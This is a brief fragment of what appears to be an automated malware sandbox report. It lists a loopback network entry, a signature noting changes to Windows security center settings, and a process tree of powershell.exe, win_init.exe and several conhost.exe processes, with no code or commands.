                              Network: 127.0.0.1 unknown unknown
                              Signatures: Changes security center settings (notifications, updates, antivirus, firewall)
                              powershell.exe
                                win_init.exe
                                conhost.exe
                              4 other processes
                                conhost.exe
                                conhost.exe
